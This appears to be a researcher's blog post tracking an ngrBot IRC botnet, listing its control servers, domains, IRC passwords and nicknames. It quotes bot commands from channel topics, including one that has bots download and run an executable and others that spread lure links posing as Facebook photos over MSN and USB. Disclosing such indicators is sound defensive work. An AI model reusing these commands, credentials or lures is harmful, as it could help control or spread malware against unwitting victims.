a.xludakx.com(ngrBot hosted in France Paris Gandi around 80k)

Very big irc botnet now for rent and hosted in france

Resolved : [a.xludakx.com] To [92.243.27.72]
92.243.27.72 5900 leaf nr4
92.243.17.156 5900

resolved [b.xludakx.com] to (92.242.140.48)
resolved [c.xludakx.com] to (92.242.140.48)
resolved [d.xludakx.com] to (92.242.140.48)

Remote Host Port Number
199.15.234.7 80
92.243.26.81 80 PASS ngrBot
92.243.26.81 3212
92.243.20.57 80 leaf nr2

Resolved : [haso.dukatlgg.com] To [92.243.27.178]
haso.dukatlgg.com 80 leaf nr3
UPDATE:
d.dukatlgg.com
Resolved : [d.dukatlgg.com] To [92.243.30.171]
Resolved : [d.dukatlgg.com] To [95.142.165.255]

a.xludakx.com 5900 leaf nr4
Resolved : [a.xludakx.com] To [92.243.27.72]

92.243.0.109:80 PASS ngrBot leaf nr7
92.243.0.109:5900 PASS ngrBot

NICK n{US|XPa}ytbwuav
USER ytbwuav 0 0 :ytbwuav
NICK n{US|XPa}jssdlij
USER jssdlij 0 0 :jssdlij

second exe file is used to download msg.txt file with commands for other bots:
DNS Query Text
sat12.fileave.com IN A +

HTTP QueriesHTTP Query Text
http://adf.ly/3DpWf GET /msg.txt HTTP/1.1

msg.txt file content:
YwKCxcStcfSFAHXHVqVQ
U http://adf.ly/3Dp23
0|hahha! http://adf.ly/3DpXX
0|ahhaha^! http://adf.ly/3DpYf
0|heheh^! http://adf.ly/3DpZO

other dns names:
pusikuracbre.com
Resolved : [pusikuracbre.com] To [91.217.153.113]

dns27.hichina.com
Resolved : [dns27.hichina.com] To [112.126.125.147]
Resolved : [dns27.hichina.com] To [114.215.31.103]
Resolved : [dns27.hichina.com] To [223.5.2.147]

dns28.hichina.com
Resolved : [dns28.hichina.com] To [114.215.31.104]
Resolved : [dns28.hichina.com] To [112.126.125.148]
Resolved : [dns28.hichina.com] To [223.5.2.148]

ns13.dns.com.cn
Resolved : [ns13.dns.com.cn] To [211.100.21.187]

ns14.dns.com.cn
Resolved : [ns14.dns.com.cn To [211.100.21.188]

ns.xinnetdns.com
Resolved : [ns.xinnet.cn] To [121.14.70.5]
Resolved : [ns.xinnet.cn] To [202.10.74.4]
Resolved : [ns.xinnet.cn] To [202.10.74.5]
Resolved : [ns.xinnet.cn] To [121.14.70.4]

Now talking in #DarkSons-01#
Topic On: [ #DarkSons-01# ] [ [Rented By Super] !NAZELup http://x.x.x.x/2darklord.exe 29F6C73E19EC686CAA8E6165D832275A -r ]
Topic By: [ Ludak32 ]

UPDATE:
92.243.20.57:5900 ircd server here

Now talking in #DarkSons-01#
Topic On: [ #DarkSons-01# ] [ [Rented to Super] ]
Topic By: [ MrDD ]
Joins: {RUS|XPa}ttehkla [ttehkla@178.122.1.18]
Joins: {BLR|W7u}xgvtewl [xgvtewl@178.121.62.187]
Joins: {EGY|W7u}djidoui [djidoui@41.206.150.121]
Joins: {RUS|XPa}cgslhuc [cgslhuc@46.216.135.194]

exe files:
http://3a6a8b64.tubeviral.com
http://2f0e5b6f.linkbucks.com

UPDATE:
92.243.27.72:5900
Server Password:
Username: hsxmztw
Nickname: n{DE|XPa}hsxmztw
Channel: ##Redrm-002## (Password: redem)
Channeltopic: :!m on !s -n !j #SPp,#DLx,#UP !j -c UA,UKR #vnc

Now talking in ##Redrm-002##
Topic On: [ ##Redrm-002## ] [ !m on !s -n !j #SPp,#DLx,#UP !j -c UA,UKR #vnc ]
Topic By: [ kuklkiljkl ]

Now talking in #SPp
Topic On: [ #SPp ] [ !mod usbi on !mod msnu off !msn.int 3 !msn.set :O hahaha! http://www.facebook.com.img092.tk/Photo-#########.jpeg !http.int 4 !http.set 😉 hehehe! http://www.facebook.com.img092.tk/Photo-#########.jpeg ]
Topic By: [ kuklkiljkl ]

Other url’s from downloader:
ze.pusikuracbre.com port 8332
Resolved : [ze.pusikuracbre.com] To [46.4.116.147]
Resolved : [ze.pusikuracbre.com] To [188.40.92.153]
Resolved : [ze.pusikuracbre.com] To [176.9.42.247]
Resolved : [ze.pusikuracbre.com] To [188.40.93.82]
Data posted to URLs
http://176.9.42.247/ (ze.pusikuracbre.com)

Outgoing connection to remote server: ze.pusikuracbre.com TCP port 8332

UPDATE:
Remote Host Port Number
199.15.234.7 80
92.243.10.12 5900 PASS ngrBot
92.243.24.196 5900 PASS ngrBot

NICK n{US|XPa}xktjxkq
USER xktjxkq 0 0 :xktjxkq
JOIN ##Redrm-002## redem

hosting infos:
http://whois.domaintools.com/92.243.26.81

Categories: Uncategorized